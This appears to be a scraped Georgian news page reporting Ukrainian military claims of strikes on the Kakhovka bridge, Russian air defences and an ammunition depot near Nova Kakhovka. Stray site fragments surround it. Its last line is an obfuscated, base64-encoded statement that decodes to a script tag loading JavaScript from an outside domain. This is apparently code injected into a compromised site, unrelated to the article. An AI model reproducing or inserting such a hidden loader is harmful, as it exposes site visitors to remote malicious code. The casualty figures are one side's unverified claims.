celsiusi
ავერსი საქკაბელი
უკრაინელმა ჯარისკაცები გასული დღის განმავლობაში კახოვკას ხიდსა და რუსეთის საჰაერო თავდაცვის სისტემებს დაარტყეს, ასევე გაანადგურეს საბრძოლო მასალის საცავი და დააზიანეს მოწინააღმდეგის სამეთაურო და სადამკვირვებლო პუნქტი, - ამის შესახებ ოპერატიული სარდლობა "სამხრეთი" იუწყება.
 
„ჩვენმა ავიაციამ 4 დარტყმა მიაყენა ბერისლავის რაიონში მოწინააღმდეგის ცოცხალ ძალას, იარაღსა და აღჭურვილობას, მათ შორის საჰაერო თავდაცვის სისტემებს ნოვაია კახოვკაში“, - აცხადებენ სარდლობაში.
 
მათივე ცნობით, სარაკეტო-საარტილერიო ქვედანაყოფებმა საცეცხლე ამოცანების შესრულების ფარგლებში კახოვკას ხიდს დაარტყეს.
 
მათივე ცნობით, მოწინააღმდეგის საბოლოო დანაკარგები ზუსტდება, მაგრამ უკვე ცნობილია, რომ უკრაინის შეიარაღებული ძალების მოქმედებების წყალობით, მტრის არმიამ დაკარგა : 12 ჯარისკაცი, 3 ერთეული ჯავშანმანქანა და საბრძოლო მასალის საცავი.
563
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");